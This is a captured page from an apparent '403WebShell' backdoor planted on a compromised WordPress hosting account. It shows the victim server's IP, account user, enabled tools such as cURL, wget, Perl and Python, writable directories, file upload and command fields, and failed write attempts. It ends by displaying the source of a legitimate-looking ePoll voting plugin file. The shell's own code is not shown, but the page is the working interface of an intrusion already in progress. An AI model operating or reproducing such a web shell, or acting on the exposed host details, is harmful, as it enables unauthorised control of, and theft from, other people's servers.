Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.15.214.244
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/misswavenigeria.com/wp-content/plugins/epoll-wp-voting/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/misswavenigeria.com/wp-content/plugins/epoll-wp-voting/it-epoll.php
<?php
/*
Plugin Name: WP Poll Survey & Voting Plugin - ePoll Lite
Plugin Uri: https://infotheme.net/product/epoll-pro/
Description: The WP Poll Maker & Voting Plugin is a unique advanced and stylish voting poll system & online contest system designed to integrate voting / poll / survey / election quiz systems into your post, pages and everywhere in website by just a shortcode. Add poll system to your post by placing shortcode or add voting system into your website.
Author: Poll Maker & Voting Plugin Team (InfoTheme)
Author URI: https://www.infotheme.net
Version: 3.5
Tags: poll, contest, poll plugin, voting plugin, election plugin, survey plugin, polling, voting, vote, survey, election, contest system, poll system, wp voting, wp poll, user poll, user voting, wp poll, poll, voting system, wp voting
Text Domain: it_epoll
Requires PHP: 5.6
Domain Path: /languages
Licence: GPLv2 or later
License URI: http://www.gnu.org/licenses/gpl-2.0.html
*/

/*###############################################################
    EPOLL 3.1 Lite (A Complete Event/Contest/Voting System)
##############################################################*/
/*********Plugin Initialization*/
require_once( ABSPATH . 'wp-admin/includes/plugin.php' );


/**ACTIVATOR*/
register_activation_hook(__FILE__, 'it_epoll_activate');

//E Poll Activation
if(!function_exists('it_epoll_activate')){
	function it_epoll_activate(){}
}else{
	$plugin = dirname(__FILE__) . '/it-epoll.php';
	deactivate_plugins($plugin);
	wp_die(esc_html('<div class="plugins">
				<h2>Epoll 3.4 Plugin Activation Error!</h2>
				<p style="background: #ffef80;padding: 10px 15px;border: 1px solid #ffc680;">We Found that you are using Our Plugin\'s Another Version, Please Deactivate That Version & than try to re-activate it. 
				Don\'t worry free plugins data will be automatically migrate into this version. 
				Thanks!</p>
			</div>','it_epoll'),'Plugin Activation Error',array('response'=>200,'back_link'=>TRUE));
}

/**ACTIVATOR*/
register_activation_hook(__FILE__, 'it_epoll_deactivate');

//E Poll Deactivation
if(!function_exists('it_epoll_deactivate')){
	function it_epoll_deactivate(){}
}


/********Constants *********/
define( 'IT_EPOLL_DIR_PATH', plugin_dir_path( __FILE__ ) ); // Root Plugin Directory Define
define( 'IT_EPOLL_DIR_URL', plugin_dir_url( __FILE__ ) ); // Root Plugin URI Define
define( 'IT_EPOLL_VERSION', '3.3'); // Root Plugin Version
define( 'IT_EPOLL_EXTENSION_STORE_URL', esc_url('https://store.infotheme.net/epoll/plugins/','it_epoll') ); // Root Plugin Directory Define
define( 'IT_EPOLL_THEME_STORE_URL', esc_url('https://store.infotheme.net/epoll/themes/','it_epoll') ); // Root Plugin Directory Define
define( 'IT_EPOLL_DOC_STORE_URL', esc_url('https://store.infotheme.net/epoll/doc/','it_epoll') ); // Root Plugin Directory Define
define( 'IT_EPOLL_THUMBNAIL_CDN_URL', esc_url('https://store.infotheme.net/epoll/thumbnail/','it_epoll') ); // Root Plugin Directory Define
define( 'IT_EPOLL_DOWNLOAD_URL', esc_url('https://store.infotheme.net/epoll/download/','it_epoll') ); // Root Plugin Directory Define

include_once('core/initial_setup.php');	
include_once('core/extras.php');		
include_once('backend/metaboxes.php');
include_once('core/enque_scripts.php');	
include_once('core/addon_loader.php');
include_once('core/template_loader.php');
include_once('core/shortcode_loader.php');
include_once('core/admin/admin_ajax.php');
?>

Youez - 2016 - github.com/yon3zu
LinuXploit